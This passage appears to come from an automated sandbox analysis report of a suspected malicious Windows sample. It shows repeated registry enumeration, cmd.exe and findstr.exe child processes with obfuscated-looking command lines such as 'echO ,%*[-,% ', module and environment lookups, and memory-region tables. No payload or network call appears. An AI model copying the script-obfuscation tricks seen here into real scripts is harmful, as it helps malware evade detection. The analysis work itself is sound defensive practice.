Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Module (10)
»
Operation Module Additional Information Success Count Logfile
Load ADVAPI32.dll base_address = 0x7feff0e0000 True 1
Fn
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegEnumKeyW, address_out = 0x7feff0fbf20 True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:15 (UTC) True 1
Fn
Get Time type = Ticks, time = 140728 True 1
Fn
Environment (9)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Process #10: findstr.exe
0 0
»
Information Value
ID #10
File Name c:\windows\system32\findstr.exe
Command Line fiNdStr cm
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:42, Reason: Child Process
Unmonitor End Time: 00:01:44, Reason: Self Terminated
Monitor Duration 00:00:02
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xb34
Parent PID 0xb24 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B38
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x00044fff Private Memory rw True False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory r True False False -
private_0x00000000001b0000 0x001b0000 0x0022ffff Private Memory rw True False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
findstr.exe 0xff910000 0xff925fff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory rw True False False -
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory rw True False False -
Process #11: cmd.exe
51 0
»
Information Value
ID #11
File Name c:\windows\system32\cmd.exe
Command Line C:\Windows\system32\cmd.exe /S /D /c" echO ,%*[-,% "
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:43, Reason: Child Process
Unmonitor End Time: 00:01:44, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0xb3c
Parent PID 0xb04 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B40
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x00044fff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00041fff Pagefile Backed Memory rw True False False -
private_0x0000000000050000 0x00050000 0x0014ffff Private Memory rw True False False -
pagefile_0x0000000000150000 0x00150000 0x00153fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory r True False False -
private_0x0000000000170000 0x00170000 0x00170fff Private Memory rw True False False -
private_0x0000000000180000 0x00180000 0x00180fff Private Memory rw True False False -
private_0x00000000001c0000 0x001c0000 0x002bffff Private Memory rw True False False -
locale.nls 0x002c0000 0x00326fff Memory Mapped File r False False False -
private_0x0000000000410000 0x00410000 0x0041ffff Private Memory rw True False False -
private_0x0000000000420000 0x00420000 0x0051ffff Private Memory rw True False False -
pagefile_0x0000000000520000 0x00520000 0x006a7fff Pagefile Backed Memory r True False False -
pagefile_0x00000000006b0000 0x006b0000 0x00830fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000840000 0x00840000 0x01c3ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001c40000 0x01c40000 0x01f82fff Pagefile Backed Memory r True False False -
private_0x0000000001f90000 0x01f90000 0x0208ffff Private Memory rw True False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffd3000 0x7fffffd3000 0x7fffffd3fff Private Memory rw True False False -
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory rw True False False -
Host Behavior
File (12)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 6
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Write STD_OUTPUT_HANDLE size = 1095 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:16 (UTC) True 1
Fn
Get Time type = Ticks, time = 141321 True 1
Fn
Environment (10)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Fn
Data
